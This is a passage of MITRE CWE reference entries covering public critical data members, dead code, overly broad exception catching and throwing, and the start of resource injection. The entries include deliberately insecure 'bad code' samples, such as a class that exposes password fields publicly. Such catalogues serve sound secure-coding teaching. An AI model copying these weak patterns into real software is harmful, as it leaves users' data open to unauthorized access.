strcpy(this->password, password);

}

int authorizeAccess(char *username, char *password)
{

if ((strlen(username) > MAX_USERNAME_LENGTH) ||
(strlen(password) > MAX_PASSWORD_LENGTH)) {

ExitError("Invalid username or password");

}
// if the username and password in the input parameters are equal to

// the username and password of this account class then authorize access
if (strcmp(this->username, username) ||
strcmp(this->password, password))

return 0;

// otherwise do not authorize access
else

return 1;

}

char username[MAX_USERNAME_LENGTH+1];
char password[MAX_PASSWORD_LENGTH+1];

};

However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes.

(good code)

Example Language: C++

class UserAccount
{
public:

...

private:

char username[MAX_USERNAME_LENGTH+1];
char password[MAX_PASSWORD_LENGTH+1];

};

Selected Observed Examples

Reference	Description
CVE-2010-3860	variables declared public allow remote read of system properties such as user name and home directory.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)
Indirect	(where the weakness is a quality issue that might indirectly make it easier to introduce security-relevant weaknesses or make them more difficult to detect)

Detection Methods

Method

Details

Automated Static Analysis

Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	849	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 6 - Object Orientation (OBJ)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1002	SFP Secondary Cluster: Unexpected Entry Points
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1130	CISQ Quality Measures (2016) - Maintainability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1139	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 05. Object Orientation (OBJ)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1412	Comprehensive Categorization: Poor Coding Practices

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Mapped Node Name
CLASP		Failure to protect stored data from modification
The CERT Oracle Secure Coding Standard for Java (2011)	OBJ01-J	Declare data members as private and provide accessible wrapper methods
Software Fault Patterns	SFP28	Unexpected access points
OMG ASCMM	ASCMM-MNT-15

References

[REF-960]

Object Management Group (OMG). "Automated Source Code Maintainability Measure (ASCMM)". ASCMM-MNT-15. 2016-01.
<https://www.omg.org/spec/ASCMM/>. (URL validated: 2023-04-07)

Content History

Submissions
Submission Date	Submitter	Organization
2009-03-03 (CWE 1.4, 2009-05-27)	CWE Content Team	MITRE
2009-03-03 (CWE 1.4, 2009-05-27)
Modifications
Modification Date	Modifier	Organization
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Demonstrative_Examples
2023-10-26	CWE Content Team	MITRE
2023-10-26	updated Observed_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, References, Relationships, Time_of_Introduction, Type
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Likelihood_of_Exploit, Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings
2010-12-13	CWE Content Team	MITRE
2010-12-13	updated Observed_Examples
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Demonstrative_Examples
Previous Entry Names
Change Date	Previous Entry Name
2019-01-03	Critical Variable Declared Public

Weakness ID: 561

View customized information:

Description

The product contains dead code, which can never be executed.

Extended Description

Dead code is code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed.

Common Consequences

Impact	Details
Quality Degradation	Scope: Other Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality.
Reduce Maintainability	Scope: Other

Potential Mitigations

Phase(s)	Mitigation
Implementation	Remove dead code before deploying the application.
Testing	Use a static analysis tool to spot dead code.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	1164	Irrelevant Code
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	570	Expression is Always False
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	571	Expression is Always True

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1006	Bad Coding Practices

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

Class: Not Language-Specific (Undetermined Prevalence)

Demonstrative Examples

Example 1

The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null. However, on the only path where s can be assigned a non-null value, there is a return statement.

(bad code)

Example Language: C++

String s = null;
if (b) {

s = "Yes";
return;

}

if (s != null) {

Dead();

}

Example 2

In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code.

(bad code)

Example Language: Java

public class DoubleDead {

private void doTweedledee() {

doTweedledumb();

}
private void doTweedledumb() {

doTweedledee();

}
public static void main(String[] args) {

System.out.println("running DoubleDead");

}

(In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.)

Example 3

The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant.

(bad code)

Example Language: Java

public class Dead {

String glue;

public String getGlue() {

return "glue";

}

Selected Observed Examples

Reference

Description

CVE-2014-1266

Chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). The code's whitespace indentation did not reflect the actual control flow (CWE-1114) and did not explicitly delimit the block (CWE-483), which could have made it more difficult for human code auditors to detect the vulnerability.

Weakness Ordinalities

Ordinality	Description
Indirect	(where the weakness is a quality issue that might indirectly make it easier to introduce security-relevant weaknesses or make them more difficult to detect)

Detection Methods

Method	Details
Architecture or Design Review	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) Formal Methods / Correct-By-Construction Cost effective for partial coverage: Attack Modeling Effectiveness: High
Automated Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Binary / Bytecode Quality Analysis Compare binary / bytecode to application permission manifest Effectiveness: High
Dynamic Analysis with Manual Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Automated Monitored Execution Effectiveness: SOAR Partial
Automated Static Analysis	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Permission Manifest Analysis Effectiveness: SOAR Partial
Automated Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Source Code Quality Analyzer Cost effective for partial coverage: Warning Flags Source code Weakness Analyzer Context-configured Source Code Weakness Analyzer Effectiveness: High
Dynamic Analysis with Automated Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Web Application Scanner Web Services Scanner Database Scanners Effectiveness: SOAR Partial
Manual Static Analysis - Source Code	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Manual Source Code Review (not inspections) Cost effective for partial coverage: Focused Manual Spotcheck - Focused manual analysis of source Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	747	CERT C Secure Coding Standard (2008) Chapter 14 - Miscellaneous (MSC)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	883	CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	886	SFP Primary Cluster: Unused entities
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1130	CISQ Quality Measures (2016) - Maintainability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1186	SEI CERT Perl Coding Standard - Guidelines 50. Miscellaneous (MSC)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1307	CISQ Quality Measures - Maintainability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1412	Comprehensive Categorization: Poor Coding Practices

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
CERT C Secure Coding	MSC07-C		Detect and remove dead code
SEI CERT Perl Coding Standard	MSC00-PL	Exact	Detect and remove dead code
Software Fault Patterns	SFP2		Unused Entities
OMG ASCMM	ASCMM-MNT-20

References

[REF-960]	Object Management Group (OMG). "Automated Source Code Maintainability Measure (ASCMM)". ASCMM-MNT-20. 2016-01. <https://www.omg.org/spec/ASCMM/>. (URL validated: 2023-04-07)
[REF-1479]	Gregory Larsen, E. Kenneth Hong Fong, David A. Wheeler and Rama S. Moorthy. "State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation". 2014-07. <https://www.ida.org/-/media/feature/publications/s/st/stateoftheart-resources-soar-for-software-vulnerability-detection-test-and-evaluation/p-5061.ashx>. (URL validated: 2025-09-05)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	Anonymous Tool Vendor (under NDA)
2006-07-19 (CWE Draft 3, 2006-07-19)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Observed_Examples
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Detection_Factors, References
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Demonstrative_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated References, Relationships
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Description
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Observed_Examples
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Applicable_Platforms, Observed_Examples, Relationships
2019-06-20	CWE Content Team	MITRE
2019-06-20	updated Type
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Relationships, Taxonomy_Mappings
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Detection_Factors, Taxonomy_Mappings
2014-06-23	CWE Content Team	MITRE
2014-06-23	updated Observed_Examples
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Common_Consequences, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Relationships, Taxonomy_Mappings
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Common_Consequences, Other_Notes
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Demonstrative_Examples
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Demonstrative_Examples
2008-11-24	CWE Content Team	MITRE
2008-11-24	updated Relationships, Taxonomy_Mappings
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Description, Relationships, Other_Notes, Taxonomy_Mappings
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Potential_Mitigations, Time_of_Introduction

Weakness ID: 396

View customized information:

Description

Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Extended Description

Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of a language's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.

Common Consequences

Impact	Details
Hide Activities	Scope: Non-Repudiation, Other A generic exception can hide details about unexpected adversary activities by making it difficult to properly troubleshoot error conditions during execution.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	221	Information Loss or Omission
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	705	Incorrect Control Flow Scoping
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	755	Improper Handling of Exceptional Conditions

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	389	Error Conditions, Return Values, Status Codes

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

C++ (Undetermined Prevalence)

Java (Undetermined Prevalence)

C# (Undetermined Prevalence)

Python (Undetermined Prevalence)

Demonstrative Examples

Example 1

The following code excerpt handles three types of exceptions in an identical fashion.

(good code)

Example Language: Java

try {

doExchange();

}
catch (IOException e) {

logger.error("doExchange failed", e);

}
catch (InvocationTargetException e) {

logger.error("doExchange failed", e);

}
catch (SQLException e) {

logger.error("doExchange failed", e);

}

At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:

(bad code)

Example Language: Java

try {

doExchange();

}
catch (Exception e) {

logger.error("doExchange failed", e);

}

However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer's intent.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	388	7PK - Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	960	SFP Secondary Cluster: Ambiguous Exception Type
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1129	CISQ Quality Measures (2016) - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1410	Comprehensive Categorization: Insufficient Control Flow Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1445	OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Mapped Node Name
7 Pernicious Kingdoms		Overly-Broad Catch Block
Software Fault Patterns	SFP5	Ambiguous Exception Type
OMG ASCSM	ASCSM-CWE-396
OMG ASCRM	ASCRM-CWE-396

References

[REF-6]	Katrina Tsipenyuk, Brian Chess and Gary McGraw. "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors". NIST Workshop on Software Security Assurance Tools Techniques and Metrics. NIST. 2005-11-07. <https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf>.
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 9: Catching Exceptions." Page 157. McGraw-Hill. 2010.
[REF-961]	Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". ASCRM-CWE-396. 2016-01. <http://www.omg.org/spec/ASCRM/1.0/>.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-396. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	7 Pernicious Kingdoms
2006-07-19 (CWE Draft 3, 2006-07-19)
Contributions
Contribution Date	Contributor	Organization
2023-03-06	Drew Buttner	MITRE
2023-03-06	Suggested additional Applicable_Platforms and modification to extended description.
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Relationships, Weakness_Ordinalities
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Common_Consequences, Demonstrative_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Applicable_Platforms, Description, Detection_Factors, Relationships, Time_of_Introduction
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated References
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated References, Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Description, Other_Notes
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Demonstrative_Examples
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Relationships
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Applicable_Platforms
2008-09-24	CWE Content Team	MITRE
2008-09-24	Removed C from Applicable_Platforms
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	Overly-Broad Catch Block

Weakness ID: 397

View customized information:

Description

The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.

Extended Description

Declaring a method to throw Exception or Throwable promotes generic error handling procedures that make it difficult for callers to perform proper error handling and error recovery. For example, Java's exception mechanism makes it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.

Common Consequences

Impact	Details
Hide Activities; Alter Execution Logic	Scope: Non-Repudiation, Other Throwing a generic exception can hide details about unexpected adversary activities by making it difficult to properly troubleshoot error conditions during execution.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	221	Information Loss or Omission
ChildOf	Pillar - a weakness that is the most abstract type of weakness and represents a theme for all class/base/variant weaknesses related to it. A Pillar is different from a Category as a Pillar is still technically a type of weakness that describes a mistake, while a Category represents a common characteristic used to group related things.	703	Improper Check or Handling of Exceptional Conditions
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	705	Incorrect Control Flow Scoping

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	389	Error Conditions, Return Values, Status Codes

Modes Of Introduction

Phase	Note
Implementation

Applicable Platforms

Languages

C++ (Undetermined Prevalence)

C# (Undetermined Prevalence)

Java (Undetermined Prevalence)

Python (Undetermined Prevalence)

Demonstrative Examples

Example 1

The following method throws three types of exceptions.

(good code)

Example Language: Java

public void doExchange() throws IOException, InvocationTargetException, SQLException {

...

}

While it might seem tidier to write

(bad code)

Example Language: Java

public void doExchange() throws Exception {

...

}

doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement.

Example 2

Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be thrown.

(bad code)

Example Language: C++

int myfunction() throw(std::exception) {

if (0) throw out_of_range();
throw length_error();

}

In the example above, the code declares that myfunction() can throw an exception of type "std::exception" thus hiding details about the possible derived exceptions that could potentially be thrown.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Effectiveness: High

Memberships

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	388	7PK - Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	851	The CERT Oracle Secure Coding Standard for Java (2011) Chapter 8 - Exceptional Behavior (ERR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	960	SFP Secondary Cluster: Ambiguous Exception Type
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1129	CISQ Quality Measures (2016) - Reliability
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1141	SEI CERT Oracle Secure Coding Standard for Java - Guidelines 07. Exceptional Behavior (ERR)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1410	Comprehensive Categorization: Insufficient Control Flow Management
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1445	OWASP Top Ten 2025 Category A10:2025 - Mishandling of Exceptional Conditions

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Applicable Platform

For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Mapped Node Name
7 Pernicious Kingdoms		Overly-Broad Throws Declaration
The CERT Oracle Secure Coding Standard for Java (2011)	ERR07-J	Do not throw RuntimeException, Exception, or Throwable
Software Fault Patterns	SFP5	Ambiguous Exception Type
OMG ASCSM	ASCSM-CWE-397
OMG ASCRM	ASCRM-CWE-397

References

[REF-6]	Katrina Tsipenyuk, Brian Chess and Gary McGraw. "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors". NIST Workshop on Software Security Assurance Tools Techniques and Metrics. NIST. 2005-11-07. <https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf>.
[REF-961]	Object Management Group (OMG). "Automated Source Code Reliability Measure (ASCRM)". ASCRM-CWE-397. 2016-01. <http://www.omg.org/spec/ASCRM/1.0/>.
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-397. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	7 Pernicious Kingdoms
2006-07-19 (CWE Draft 3, 2006-07-19)
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Relationships, Weakness_Ordinalities
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Demonstrative_Examples
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated Detection_Factors, Relationships, Time_of_Introduction
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated References
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences, Relationships, Taxonomy_Mappings
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Description, Other_Notes
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Demonstrative_Examples
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Relationships
2008-10-14	CWE Content Team	MITRE
2008-10-14	updated Applicable_Platforms
2008-09-24	CWE Content Team	MITRE
2008-09-24	Removed C from Applicable_Platforms
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-07-01	Eric Dalci	Cigital
2008-07-01	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	Overly-Broad Throws Declaration

Weakness ID: 99

Vulnerability Mapping: ALLOWED This CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review (with careful review of mapping notes)
Abstraction: Class Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

View customized information:

Description

Extended Description

A resource injection issue occurs when the following two conditions are met:

An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.
By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server.

This may enable an attacker to access or modify otherwise protected system resources.

Alternate Terms

Insecure Direct Object Reference

OWASP uses this term, although it is effectively the same as resource injection.

Common Consequences

Impact	Details
Read Application Data; Modify Application Data; Read Files or Directories; Modify Files or Directories	Scope: Confidentiality, Integrity An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information.

Potential Mitigations

Phase(s)

Mitigation

Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

